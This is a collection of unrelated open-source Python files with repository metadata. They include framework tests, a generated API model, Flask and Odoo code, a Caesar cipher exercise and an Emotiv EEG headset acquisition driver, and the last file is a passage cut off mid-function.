apache-2.0
| 4,244 | 0.013431 |
"""Tests for two-process terminal frontend
Currently only has the most simple test possible, starting a console and running
a single command.
Authors:
* Min RK
"""
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
import sys
import time
import nose.tools as nt
from nose import SkipTest
import IPython.testing.tools as tt
from IPython.testing import decorators as dec
from IPython.utils import py3compat
#-----------------------------------------------------------------------------
# Tests
#-----------------------------------------------------------------------------
@dec.skip_win32
def test_console_starts():
"""test that `ipython console` starts a terminal"""
from IPython.external import pexpect
args = ['console', '--colors=NoColor']
# FIXME: remove workaround for 2.6 support
if sys.version_info[:2] > (2,6):
args = ['-m', 'IPython'] + args
cmd = sys.executable
else:
cmd = 'ipython'
try:
p = pexpect.spawn(cmd, args=args)
except IOError:
raise SkipTest("Couldn't find command %s" % cmd)
# timeout after one minute
t = 60
idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t)
p.sendline('5')
idx = p.expect([r'Out\[\d+\]: 5', pexpect.EOF], timeout=t)
idx = p.expect([r'In \[\d+\]', pexpect.EOF], timeout=t)
# send ctrl-D;ctrl-D to exit
p.sendeof()
p.sendeof()
p.expect([pexpect.EOF, pexpect.TIMEOUT], timeout=t)
if p.isalive():
p.terminate()
def test_help_output():
"""ipython console --help-all works"""
tt.help_all_output_test('console')
|
noslenfa/tdjangorest
|
uw/lib/python2.7/site-packages/IPython/terminal/console/tests/test_console.py
|
Python
|
apache-2.0
| 1,726 | 0.006952 |
# coding: utf-8
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.subtitle_v30_rc2 import SubtitleV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.title_v30_rc2 import TitleV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.translated_title_v30_rc2 import TranslatedTitleV30Rc2 # noqa: F401,E501
class WorkTitleV30Rc2(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'title': 'TitleV30Rc2',
'subtitle': 'SubtitleV30Rc2',
'translated_title': 'TranslatedTitleV30Rc2'
}
attribute_map = {
'title': 'title',
'subtitle': 'subtitle',
'translated_title': 'translated-title'
}
def __init__(self, title=None, subtitle=None, translated_title=None): # noqa: E501
"""WorkTitleV30Rc2 - a model defined in Swagger""" # noqa: E501
self._title = None
self._subtitle = None
self._translated_title = None
self.discriminator = None
if title is not None:
self.title = title
if subtitle is not None:
self.subtitle = subtitle
if translated_title is not None:
self.translated_title = translated_title
@property
def title(self):
"""Gets the title of this WorkTitleV30Rc2. # noqa: E501
:return: The title of this WorkTitleV30Rc2. # noqa: E501
:rtype: TitleV30Rc2
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this WorkTitleV30Rc2.
:param title: The title of this WorkTitleV30Rc2. # noqa: E501
:type: TitleV30Rc2
"""
self._title = title
@property
def subtitle(self):
"""Gets the subtitle of this WorkTitleV30Rc2. # noqa: E501
:return: The subtitle of this WorkTitleV30Rc2. # noqa: E501
:rtype: SubtitleV30Rc2
"""
return self._subtitle
@subtitle.setter
def subtitle(self, subtitle):
"""Sets the subtitle of this WorkTitleV30Rc2.
:param subtitle: The subtitle of this WorkTitleV30Rc2. # noqa: E501
:type: SubtitleV30Rc2
"""
self._subtitle = subtitle
@property
def translated_title(self):
"""Gets the translated_title of this WorkTitleV30Rc2. # noqa: E501
:return: The translated_title of this WorkTitleV30Rc2. # noqa: E501
:rtype: TranslatedTitleV30Rc2
"""
return self._translated_title
@translated_title.setter
def translated_title(self, translated_title):
"""Sets the translated_title of this WorkTitleV30Rc2.
:param translated_title: The translated_title of this WorkTitleV30Rc2. # noqa: E501
:type: TranslatedTitleV30Rc2
"""
self._translated_title = translated_title
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(WorkTitleV30Rc2, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, WorkTitleV30Rc2):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
Royal-Society-of-New-Zealand/NZ-ORCID-Hub
|
orcid_api_v3/models/work_title_v30_rc2.py
|
Python
|
mit
| 4,930 | 0.000203 |
# Copyright 2021 Alfredo de la Fuente - Avanzosc S.L.
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from odoo.tests import common
from odoo.tests import tagged
@tagged("post_install", "-at_install")
class TestNameCodeYearId(common.SavepointCase):
@classmethod
def setUpClass(cls):
super(TestNameCodeYearId, cls).setUpClass()
cls.event_obj = cls.env['event.event']
cls.skill_type_lang = cls.env.ref('hr_skills.hr_skill_type_lang')
cls.skill_spanish = cls.env.ref('hr_skills.hr_skill_spanish')
cls.skill_filipino = cls.env.ref('hr_skills.hr_skill_filipino')
cls.skill_type_lang.skill_language = True
cls.skill_spanish.code = 'SP'
cls.skill_filipino.code = 'FI'
def test_event_name_code_year_id(self):
vals = {'name': 'User for event lang level',
'date_begin': '2025-01-06 08:00:00',
'date_end': '2025-01-15 10:00:00',
'lang_id': self.skill_spanish.id}
event = self.event_obj.create(vals)
name = 'SP-{}-2025'.format(event.id)
self.assertEqual(event.name, name)
vals = {'date_begin': '2024-01-06 08:00:00',
'lang_id': self.skill_filipino.id}
event.write(vals)
name = 'FI-{}-2024'.format(event.id)
self.assertEqual(event.name, name)
|
avanzosc/odoo-addons
|
event_name_code_year_id/tests/test_event_name_code_year_id.py
|
Python
|
agpl-3.0
| 1,353 | 0 |
import traceback
from sqlalchemy import Column, Boolean, Integer, String, ForeignKey, create_engine
from sqlalchemy.orm import relationship, sessionmaker, scoped_session
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
engine = create_engine('sqlite:///bag_of_holding.db')
Base.metadata.bind = engine
session_factory = sessionmaker(bind=engine)
Session = scoped_session(session_factory)
session = Session()
class UserManager:
def build_db(self):
Base.metadata.create_all(engine)
def add_user(self, user_name):
"""
Create a new user
:return:
"""
def remove_user(self, user_name):
"""
Remove a current user
:param user_name:
:return:
"""
def add_user_profile(self, user_name, service_name):
"""
Add a service profile to a user_name
:param user_name:
:param service_name:
:return:
"""
def remove_user_profile(self, user_name, service_id):
"""
remove a service profile from a user_name
:param user_name:
:param service_id:
:return:
"""
def add_profile_trait(self, user_name, service_id, trait_name, trait_value):
"""
Add a trait to a service profile
:param user_name:
:param service_id:
:param trait_name
:param trait_value
:return:
"""
def remove_profile_trait(self, user_name, service_id, trait_id):
"""
        Remove a trait from a service profile
:param user_name:
:param service_id:
:param trait_id
:return:
"""
class User(Base):
__tablename__ = 'users'
id = Column(Integer, primary_key=True)
name = Column(String)
profiles = relationship('UserProfile')
def __repr__(self):
return '<User(id={})>'.format(self.id)
class UserProfile(Base):
__tablename__ = 'userprofiles'
id = Column(Integer, primary_key=True)
service_name = Column(String)
service_url = Column(String)
profile_id = Column(String)
    user_id = Column(Integer, ForeignKey('users.id'))
def __repr__(self):
return '<UserProfile(id={}, service_name={}, service_url={}, profile_id={})>'\
.format(self.id, self.service_name, self.service_url, self.profile_id)
class ProfileTrait(Base):
__tablename__ = 'profiletraits'
id = Column(Integer, primary_key=True)
name = Column(String)
value = Column(String)
def __repr__(self):
return '<ProfileTrait(id={}, name={}, value={})>'.format(self.id, self.name, self.value)
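# Minimal usage sketch (illustrative; the UserManager CRUD methods above are
# still stubs, so this talks to the module-level session directly; the user
# name is a placeholder):
def _example_setup():
    UserManager().build_db()
    session.add(User(name='alice'))
    session.commit()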
|
gradiuscypher/internet_illithid
|
bag_of_holding/libs/user_manager.py
|
Python
|
mit
| 2,633 | 0.001899 |
def get_encrypted_char(k, ascii_val, ascii_list, limit):
diff = k % 26
rotate_val = ascii_val + diff
encrypted_char = ''
if rotate_val not in ascii_list:
rotate_val -= limit
for i in ascii_list:
rotate_val -= 1
if rotate_val == 0:
encrypted_char += chr(i)
else:
encrypted_char += chr(rotate_val)
return encrypted_char
def encrypt(s, k):
"""
a-z : 97-122
A-Z : 65-90
:param s: string to be encrypted
:param k: Integer, by which each character is rotated
:return: Encrypted string
"""
lower_ascii_list = [i for i in range(97, 123)]
upper_ascii_list = [i for i in range(65, 91)]
lower_case_limit = 122
upper_case_limit = 90
encrypted_string = str()
for c in s:
ascii_val = ord(c)
if ascii_val in lower_ascii_list or ascii_val in upper_ascii_list:
limit = lower_case_limit
ascii_list = lower_ascii_list
if ascii_val in upper_ascii_list:
limit = upper_case_limit
ascii_list = upper_ascii_list
encrypted_string += get_encrypted_char(k, ascii_val, ascii_list,
limit)
else:
encrypted_string += c
return encrypted_string
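# Worked example (hypothetical input): with k=2, encrypt("middle-Outz", 2)
# returns "okffng-Qwvb" -- letters rotate by two within their own case and
# the '-' passes through unchanged.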
l = raw_input()
s = raw_input()
k = int(raw_input())
print encrypt(s, k)
|
spradeepv/dive-into-python
|
hackerrank/domain/algorithms/implementation/caesar_cipher/solution.py
|
Python
|
mit
| 1,399 | 0.002144 |
# -*- coding: utf-8 -*-
# © 2015 Compassion CH (Nicolas Tran)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo import api, models
class AccountPaymentOrder(models.Model):
_inherit = 'account.payment.order'
@api.multi
def open2generated(self):
"""
Replace action to propose upload SEPA file to FDS.
:return: window action
"""
action = super(AccountPaymentOrder, self).open2generated()
if self.payment_method_id.code == 'sepa_credit_transfer':
upload_obj = self.env['payment.order.upload.sepa.wizard']
attachment_id = action['res_id']
upload_wizard = upload_obj.create({
'attachment_id': attachment_id,
'payment_order_id': self.id,
})
del action['view_id']
action.update({
'res_model': upload_obj._name,
'res_id': upload_wizard.id,
'flags': {'initial_mode': 'edit'},
'attachment_id': attachment_id
})
return action
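# Flow sketch (illustrative): for the 'sepa_credit_transfer' payment method,
# the attachment produced by the standard open2generated() is handed to a
# payment.order.upload.sepa.wizard, and the returned window action is
# redirected to that wizard in edit mode so the file can be uploaded to FDS.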
|
CompassionCH/l10n-switzerland
|
l10n_ch_fds_upload_sepa/models/account_payment_order.py
|
Python
|
agpl-3.0
| 1,096 | 0 |
from flask import Blueprint, render_template, redirect, url_for
from flask_blog.extensions import mongo
from flask_blog.helpers import convertToObj
from flask.ext.login import login_required, current_user
from forms import PostsForm
posts = Blueprint('posts', __name__, template_folder='templates',
static_folder='static', static_url_path='/%s' % __name__)
@posts.route("/posts")
@login_required
def list():
posts = mongo.db.posts.find()
return render_template('posts_list.html', posts=posts)
@posts.route("/posts/add", methods=['GET', 'POST'])
@login_required
def add():
form = PostsForm()
if form.validate_on_submit():
mongo.db.posts.insert(_add_username(form.data))
return redirect(url_for("posts.list"))
return render_template('post_add.html', form=form)
@posts.route("/posts/get/<ObjectId:id>")
def get(id):
post = mongo.db.posts.find_one_or_404(id)
return render_template('post_get.html', post=post)
@posts.route("/posts/edit/<ObjectId:id>", methods=['GET', 'POST'])
@login_required
def edit(id):
post = mongo.db.posts.find_one_or_404(id)
form = PostsForm(obj=convertToObj(**post))
if form.validate_on_submit():
form.populate_obj(convertToObj(**post))
mongo.db.posts.update({'_id': id},
{'$set': form.data}
)
return redirect(url_for("posts.list"))
return render_template('post_edit.html', form=form, post=post)
@posts.route("/posts/delete/<ObjectId:id>")
@login_required
def delete(id):
mongo.db.posts.remove(id)
return redirect(url_for("posts.list"))
def _add_username(form):
post = form
post.update({"author": current_user.username})
return post
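# Request-flow sketch (illustrative): add() runs the submitted form data
# through _add_username() before inserting into mongo.db.posts, so every
# stored post carries the logged-in user's name in its 'author' field.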
|
sboily/flask-blog
|
flask_blog/plugins/posts/views.py
|
Python
|
gpl-3.0
| 1,743 | 0.003442 |
# copyright 2003-2012 LOGILAB S.A. (Paris, FRANCE), all rights reserved.
# contact http://www.logilab.fr/ -- mailto:contact@logilab.fr
#
# This file is part of Logilab-Common.
#
# Logilab-Common is free software: you can redistribute it and/or modify it under the
# terms of the GNU Lesser General Public License as published by the Free
# Software Foundation, either version 2.1 of the License, or (at your option)
# any later version.
#
# Logilab-Common is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
# details.
#
# You should have received a copy of the GNU Lesser General Public License along
# with Logilab-Common. If not, see <http://www.gnu.org/licenses/>.
"""unit tests for selectors mechanism"""
from __future__ import with_statement
import gc
import logging
import os.path as osp
import sys
from operator import eq, lt, le, gt
from contextlib import contextmanager
logging.basicConfig(level=logging.ERROR)
from logilab.common.testlib import TestCase, unittest_main
from logilab.common.registry import *
class _1_(Predicate):
def __call__(self, *args, **kwargs):
return 1
class _0_(Predicate):
def __call__(self, *args, **kwargs):
return 0
def _2_(*args, **kwargs):
return 2
class SelectorsTC(TestCase):
def test_basic_and(self):
selector = _1_() & _1_()
self.assertEqual(selector(None), 2)
selector = _1_() & _0_()
self.assertEqual(selector(None), 0)
selector = _0_() & _1_()
self.assertEqual(selector(None), 0)
def test_basic_or(self):
selector = _1_() | _1_()
self.assertEqual(selector(None), 1)
selector = _1_() | _0_()
self.assertEqual(selector(None), 1)
selector = _0_() | _1_()
self.assertEqual(selector(None), 1)
selector = _0_() | _0_()
self.assertEqual(selector(None), 0)
def test_selector_and_function(self):
selector = _1_() & _2_
self.assertEqual(selector(None), 3)
selector = _2_ & _1_()
self.assertEqual(selector(None), 3)
def test_three_and(self):
selector = _1_() & _1_() & _1_()
self.assertEqual(selector(None), 3)
selector = _1_() & _0_() & _1_()
self.assertEqual(selector(None), 0)
selector = _0_() & _1_() & _1_()
self.assertEqual(selector(None), 0)
def test_three_or(self):
selector = _1_() | _1_() | _1_()
self.assertEqual(selector(None), 1)
selector = _1_() | _0_() | _1_()
self.assertEqual(selector(None), 1)
selector = _0_() | _1_() | _1_()
self.assertEqual(selector(None), 1)
selector = _0_() | _0_() | _0_()
self.assertEqual(selector(None), 0)
def test_composition(self):
selector = (_1_() & _1_()) & (_1_() & _1_())
self.assertTrue(isinstance(selector, AndPredicate))
self.assertEqual(len(selector.selectors), 4)
self.assertEqual(selector(None), 4)
selector = (_1_() & _0_()) | (_1_() & _1_())
self.assertTrue(isinstance(selector, OrPredicate))
self.assertEqual(len(selector.selectors), 2)
self.assertEqual(selector(None), 2)
def test_search_selectors(self):
sel = _1_()
self.assertIs(sel.search_selector(_1_), sel)
csel = AndPredicate(sel, Predicate())
self.assertIs(csel.search_selector(_1_), sel)
csel = AndPredicate(Predicate(), sel)
self.assertIs(csel.search_selector(_1_), sel)
self.assertIs(csel.search_selector((AndPredicate, OrPredicate)), csel)
self.assertIs(csel.search_selector((OrPredicate, AndPredicate)), csel)
self.assertIs(csel.search_selector((_1_, _0_)), sel)
self.assertIs(csel.search_selector((_0_, _1_)), sel)
def test_inplace_and(self):
selector = _1_()
selector &= _1_()
selector &= _1_()
self.assertEqual(selector(None), 3)
selector = _1_()
selector &= _0_()
selector &= _1_()
self.assertEqual(selector(None), 0)
selector = _0_()
selector &= _1_()
selector &= _1_()
self.assertEqual(selector(None), 0)
selector = _0_()
selector &= _0_()
selector &= _0_()
self.assertEqual(selector(None), 0)
def test_inplace_or(self):
selector = _1_()
selector |= _1_()
selector |= _1_()
self.assertEqual(selector(None), 1)
selector = _1_()
selector |= _0_()
selector |= _1_()
self.assertEqual(selector(None), 1)
selector = _0_()
selector |= _1_()
selector |= _1_()
self.assertEqual(selector(None), 1)
selector = _0_()
selector |= _0_()
selector |= _0_()
self.assertEqual(selector(None), 0)
def test_wrap_selectors(self):
class _temp_(Predicate):
def __call__(self, *args, **kwargs):
return 0
del _temp_ # test weakref
s1 = _1_() & _1_()
s2 = _1_() & _0_()
s3 = _0_() & _1_()
gc.collect()
self.count = 0
def decorate(f, self=self):
def wrapper(*args, **kwargs):
self.count += 1
return f(*args, **kwargs)
return wrapper
wrap_predicates(decorate)
self.assertEqual(s1(None), 2)
self.assertEqual(s2(None), 0)
self.assertEqual(s3(None), 0)
self.assertEqual(self.count, 8)
@contextmanager
def prepended_syspath(path):
sys.path.insert(0, path)
yield
sys.path = sys.path[1:]
class RegistryStoreTC(TestCase):
def test_autoload(self):
store = RegistryStore()
store.setdefault('zereg')
with prepended_syspath(self.datadir):
store.register_objects([self.datapath('regobjects.py'),
self.datapath('regobjects2.py')])
self.assertEqual(['zereg'], store.keys())
self.assertEqual(set(('appobject1', 'appobject2', 'appobject3')),
set(store['zereg']))
class RegistrableInstanceTC(TestCase):
def test_instance_modulename(self):
# no inheritance
obj = RegistrableInstance()
self.assertEqual(obj.__module__, 'unittest_registry')
# with inheritance from another python file
with prepended_syspath(self.datadir):
from regobjects2 import instance, MyRegistrableInstance
instance2 = MyRegistrableInstance()
self.assertEqual(instance.__module__, 'regobjects2')
self.assertEqual(instance2.__module__, 'unittest_registry')
if __name__ == '__main__':
unittest_main()
|
esparta/logilab_common3
|
test/unittest_registry.py
|
Python
|
gpl-2.0
| 6,824 | 0.001465 |
#!/usr/bin/env python
import os
# Context manager
class cd:
"""
Context manager for safely changing the current working directory
"""
def __init__(self, newPath):
self.newPath = os.path.expanduser(newPath)
def __enter__(self):
self.savedPath = os.getcwd()
os.chdir(self.newPath)
def __exit__(self, etype, value, traceback):
os.chdir(self.savedPath)
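# Usage sketch (hypothetical path): the saved directory is restored on exit
# even if the block raises.
#
#   with cd('~/projects'):
#       print(os.getcwd())   # now inside ~/projects
#   # back in the original working directory here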
|
JohnGiorgi/SRA-RNAseq-Workflow
|
SRA_RNAseq_Workflow/helpers.py
|
Python
|
gpl-3.0
| 366 | 0.030055 |
# -*- coding: utf-8 -*-
"""
Emotiv acquisition :
Reverse engineering and original crack code written by
Cody Brocious (http://github.com/daeken)
Kyle Machulis (http://github.com/qdot)
Many thanks for their contributions.
Requires python-crypto.
"""
import multiprocessing as mp
import numpy as np
import msgpack
import time
from collections import OrderedDict
from .base import DeviceBase
import platform
WINDOWS = (platform.system() == "Windows")
try:
import pywinusb.hid as hid
except:
pass
import os
from subprocess import check_output
from Crypto.Cipher import AES
from Crypto import Random
import Queue
tasks = Queue.Queue()
_channel_names = [ 'F3', 'F4', 'P7', 'FC6', 'F7', 'F8','T7','P8','FC5','AF4','T8','O2','O1','AF3']
sensorBits = {
'F3': [10, 11, 12, 13, 14, 15, 0, 1, 2, 3, 4, 5, 6, 7],
'FC5': [28, 29, 30, 31, 16, 17, 18, 19, 20, 21, 22, 23, 8, 9],
'AF3': [46, 47, 32, 33, 34, 35, 36, 37, 38, 39, 24, 25, 26, 27],
'F7': [48, 49, 50, 51, 52, 53, 54, 55, 40, 41, 42, 43, 44, 45],
'T7': [66, 67, 68, 69, 70, 71, 56, 57, 58, 59, 60, 61, 62, 63],
'P7': [84, 85, 86, 87, 72, 73, 74, 75, 76, 77, 78, 79, 64, 65],
'O1': [102, 103, 88, 89, 90, 91, 92, 93, 94, 95, 80, 81, 82, 83],
'O2': [140, 141, 142, 143, 128, 129, 130, 131, 132, 133, 134, 135, 120, 121],
'P8': [158, 159, 144, 145, 146, 147, 148, 149, 150, 151, 136, 137, 138, 139],
'T8': [160, 161, 162, 163, 164, 165, 166, 167, 152, 153, 154, 155, 156, 157],
'F8': [178, 179, 180, 181, 182, 183, 168, 169, 170, 171, 172, 173, 174, 175],
'AF4': [196, 197, 198, 199, 184, 185, 186, 187, 188, 189, 190, 191, 176, 177],
'FC6': [214, 215, 200, 201, 202, 203, 204, 205, 206, 207, 192, 193, 194, 195],
'F4': [216, 217, 218, 219, 220, 221, 222, 223, 208, 209, 210, 211, 212, 213]
}
quality_bits = [99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112]
def create_analog_subdevice_param(channel_names):
n = len(channel_names)
d = {
'type' : 'AnalogInput',
'nb_channel' : n,
'params' :{ },
'by_channel_params' : {
'channel_indexes' : range(n),
'channel_names' : channel_names,
}
}
return d
def get_info(device):
info = { }
info['class'] = 'EmotivMultiSignals'
if WINDOWS:
# EMOTIV
info['device_path'] = device.device_path
info['board_name'] = '{} #{}'.format(device.vendor_name, device.serial_number).replace('\n', '').replace('\r', '')
info['serial'] = device.serial_number
info['hid'] = device
else:
info['device_path'] = device
        name = device.strip('/dev/')
realInputPath = os.path.realpath("/sys/class/hidraw/" + name)
path = '/'.join(realInputPath.split('/')[:-4])
with open(path + "/manufacturer", 'r') as f:
manufacturer = f.readline()
with open(path + "/serial", 'r') as f:
serial = f.readline().strip()
info['board_name'] = '{} #{}'.format(manufacturer, serial).replace('\n', '').replace('\r', '')
info['serial'] = serial
# PYACQ
info['global_params'] = {'buffer_length' : 60.,}
info['subdevices'] = [ ]
info['subdevices'].append(create_analog_subdevice_param(_channel_names))
quality_name = ['Quality {}'.format(n) for n in _channel_names]
info['subdevices'].append(create_analog_subdevice_param(quality_name))
info['subdevices'].append(create_analog_subdevice_param([ 'X','Y']))
return info
def dump(obj):
for attr in dir(obj):
print "obj.%s = %s" % (attr, getattr(obj, attr))
class EmotivMultiSignals(DeviceBase):
def __init__(self, **kargs):
DeviceBase.__init__(self, **kargs)
@classmethod
def get_available_devices(cls):
devices = OrderedDict()
if WINDOWS:
try:
for device in hid.find_all_hid_devices():
print "device : ", device
if (device.product_name == 'Emotiv RAW DATA' or device.product_name == 'EPOC BCI'):
devices['Emotiv '+device.serial_number] = get_info(device)
finally:
pass
else:
serials = { }
for name in os.listdir("/sys/class/hidraw"):
realInputPath = os.path.realpath("/sys/class/hidraw/" + name)
path = '/'.join(realInputPath.split('/')[:-4])
try:
with open(path + "/manufacturer", 'r') as f:
manufacturer = f.readline()
if "emotiv" in manufacturer.lower():
with open(path + "/serial", 'r') as f:
serial = f.readline().strip()
if serial not in serials:
serials[serial] = [ ]
serials[serial].append(name)
except IOError as e:
print "Couldn't open file: %s" % e
for serial, names in serials.items():
device_path = '/dev/'+names[1]
info = get_info(device_path)
devices['Emotiv '+device_path] = info
return devices
def configure(self, buffer_length = 60,
subdevices = None,
):
self.params = {'buffer_length' : buffer_length,
'subdevices' : subdevices,
}
self.__dict__.update(self.params)
self.configured = True
def initialize(self):
devices = EmotivMultiSignals.get_available_devices()
self.device = devices.values()[0]
if self.subdevices is None:
self.subdevices = self.device['subdevices']
self.sampling_rate = 128.
self.packet_size = 1
l = int(self.sampling_rate*self.buffer_length)
self.buffer_length = (l - l%self.packet_size)/self.sampling_rate
self.name = '{}'.format(self.device['board_name'])
self.streams = [ ]
for s, sub in enumerate(self.subdevices):
stream = self.streamhandler.new_AnalogSignalSharedMemStream(name = self.name+str(s) , sampling_rate = self.sampling_rate,
nb_channel = sub['nb_channel'], buffer_length = self.buffer_length,
packet_size = self.packet_size, dtype = np.float64,
channel_names = sub['by_channel_params']['channel_names'],
channel_indexes = sub['by_channel_params']['channel_indexes'],
)
self.streams.append(stream)
def start(self):
self.stop_flag = mp.Value('i', 0) #flag pultiproc = global
self.process = mp.Process(target = emotiv_mainLoop, args=(self.stop_flag, self.streams, self.device) )
self.process.start()
print 'FakeMultiAnalogChannel started:', self.name
self.running = True
def stop(self):
self.stop_flag.value = 1
self.process.join()
print 'FakeMultiAnalogChannel stopped:', self.name
self.running = False
def close(self):
if WINDOWS:
self.device['hid'].close()
else:
pass
# for ii in self.streams:
# self.streams[ii].stop()
def setupCrypto(serial):
type = 0 #feature[5]
type &= 0xF
type = 0
#I believe type == True is for the Dev headset, I'm not using that. That's the point of this library in the first place I thought.
k = ['\0'] * 16
k[0] = serial[-1]
k[1] = '\0'
k[2] = serial[-2]
if type:
k[3] = 'H'
k[4] = serial[-1]
k[5] = '\0'
k[6] = serial[-2]
k[7] = 'T'
k[8] = serial[-3]
k[9] = '\x10'
k[10] = serial[-4]
k[11] = 'B'
else:
k[3] = 'T'
k[4] = serial[-3]
k[5] = '\x10'
k[6] = serial[-4]
k[7] = 'B'
k[8] = serial[-1]
k[9] = '\0'
k[10] = serial[-2]
k[11] = 'H'
k[12] = serial[-3]
k[13] = '\0'
k[14] = serial[-4]
k[15] = 'P'
    #It doesn't make sense to have more than one greenlet handling this as data needs to be in order anyhow. I guess you could assign an ID or something
    #to each packet but that seems like a waste also or is it? The ID might be useful if you're using multiple headsets or usb sticks.
key = ''.join(k)
iv = Random.new().read(AES.block_size)
cipher = AES.new(key, AES.MODE_ECB, iv)
return cipher
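# Key-derivation note (illustrative): the 16-byte AES-ECB key assembled above
# interleaves the last four characters of the headset serial with fixed
# filler bytes; the interleaving order differs between the consumer and
# developer ('type') headsets.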
def get_level(data, bits):
level = 0
for i in range(13, -1, -1):
level <<= 1
b, o = (bits[i] / 8) + 1, bits[i] % 8
level |= (ord(data[b]) >> o) & 1
return level
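# Bit-unpacking sketch (illustrative): sensorBits['F3'] lists the 14 absolute
# bit positions of the F3 sample inside the decrypted packet; a call such as
# get_level(data, sensorBits['F3']) walks them from the highest index down,
# one (byte, offset) pair at a time, assembling a 14-bit integer.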
def emotiv_mainLoop(stop_flag, streams, device):
import zmq
abs_pos = pos = 0
#setup cryto
cipher = setupCrypto(device['serial'])
streamChan, streamImp, streamGyro = streams
#Data channels socket
context = zmq.Context()
socket_chan = context.socket(zmq.PUB)
socket_chan.bind("tcp://*:{}".format(streamChan['port']))
#Impedance channels socket
socket_imp = context.socket(zmq.PUB)
socket_imp.bind("tcp://*:{}".format(streamImp['port']))
#Gyro channels socket
socket_gyro = context.socket(zmq.PUB)
socket_gyro.bind("tcp://*:{}".format(streamGyro['port']))
packet_size = streamChan['packet_size']
sampling_rate = streamChan['sampling_rate']
np_arr_chan = streamChan['shared_array'].to_numpy_array()
np_arr_imp = streamImp['shared_array'].to_numpy_array()
np_arr_gyro = streamGyro['shared_array'].to_numpy_array()
half_size = np_arr_chan.shape[1]/2 # same for the others
impedance_qualities = { }
for name in _channel_names + ['X', 'Y', 'Unknown']:
impedance_qualities[name] = 0.
if WINDOWS:
device['hid'].open()
device['hid'].set_raw_data_handler(emotiv_handler)
else:
hidraw = open(device['device_path'])
while True:
# READ DATA
if WINDOWS:
crypted_data = tasks.get(True)
else:
crypted_data = hidraw.read(32)
# PROCESS
data = cipher.decrypt(crypted_data[:16]) + cipher.decrypt(crypted_data[16:])
# current impedance quality
sensor_num = ord(data[0])
num_to_name = { 0 : 'F3', 1:'FC5', 2 : 'AF3', 3 : 'F7', 4:'T7', 5 : 'P7',
6 : 'O1', 7 : 'O2', 8: 'P8', 9 : 'T8', 10: 'F8', 11 : 'AF4',
12 : 'FC6', 13: 'F4', 14 : 'F8', 15:'AF4',
64 : 'F3', 65 : 'FC5', 66 : 'AF3', 67 : 'F7', 68 : 'T7', 69 : 'P7',
70 : 'O1', 71 : 'O2', 72: 'P8', 73 : 'T8', 74: 'F8', 75 : 'AF4',
76 : 'FC6', 77: 'F4', 78 : 'F8', 79:'AF4',
80 : 'FC6',
}
if sensor_num in num_to_name:
sensor_name = num_to_name[sensor_num]
impedance_qualities[sensor_name] = get_level(data, quality_bits) / 540
for c, channel_name in enumerate(_channel_names):
bits = sensorBits[channel_name]
# channel value
value = get_level(data, bits)
np_arr_chan[c,pos] = value
np_arr_chan[c,pos+half_size] = value
#channel qualities
np_arr_imp[c,pos] = impedance_qualities[channel_name]
np_arr_imp[c,pos+half_size] = impedance_qualities[channel_name]
gyroX = ord(data[29]) - 106
gyroY = ord(data[30]) - 105
np_arr_gyro[:,pos] = [gyroX, gyroY]
np_arr_gyro[:,pos+half_size] = [gyroX, gyroY]
abs_pos += packet_size
pos = abs_pos%half_size
socket_chan.send(msgpack.dumps(abs_pos))
socket_imp.send(msgpack.dumps(abs_pos))
socket_gyro.send(msgpack.dumps(abs_pos))
if stop_flag.value:
print 'will stop'
break
# Windows handler
def emotiv_handler(data):
"""
Receives packets from headset for Windows. Sends them to the crypto process
"""
assert data[0] == 0
tasks.put_nowait(''.join(map(chr, data[1:])))
return True
Emotiv = EmotivMultiSignals
|
Hemisphere-Project/Telemir-DatabitMe
|
Telemir-EEG/pyacq/pyacq/core/devices/emotiv.py
|
Python
|
gpl-2.0
| 12,623 | 0.01323 |
import json
import pathlib
import re
import pytest
import snafu.versions
version_paths = list(snafu.versions.VERSIONS_DIR_PATH.iterdir())
version_names = [p.stem for p in version_paths]
@pytest.mark.parametrize('path', version_paths, ids=version_names)
def test_version_definitions(path):
assert path.suffix == '.json', '{} has wrong extension'.format(path)
assert re.match(r'^\d\.\d(?:\-32)?$', path.stem), \
'{} has invalid name'.format(path)
with path.open() as f:
data = json.load(f)
schema = data.pop('type')
possible_types = snafu.versions.InstallerType.__members__
assert schema in possible_types
assert isinstance(data.pop('version_info'), list)
if schema == 'cpython_msi':
for key in ('x86', 'amd64'):
d = data.pop(key)
assert d.pop('url')
assert re.match(r'^[a-f\d]{32}$', d.pop('md5_sum'))
elif schema == 'cpython':
assert data.pop('url')
assert re.match(r'^[a-f\d]{32}$', data.pop('md5_sum'))
assert not data, 'superfulous keys: {}'.format(', '.join(data.keys()))
def test_get_version_cpython_msi():
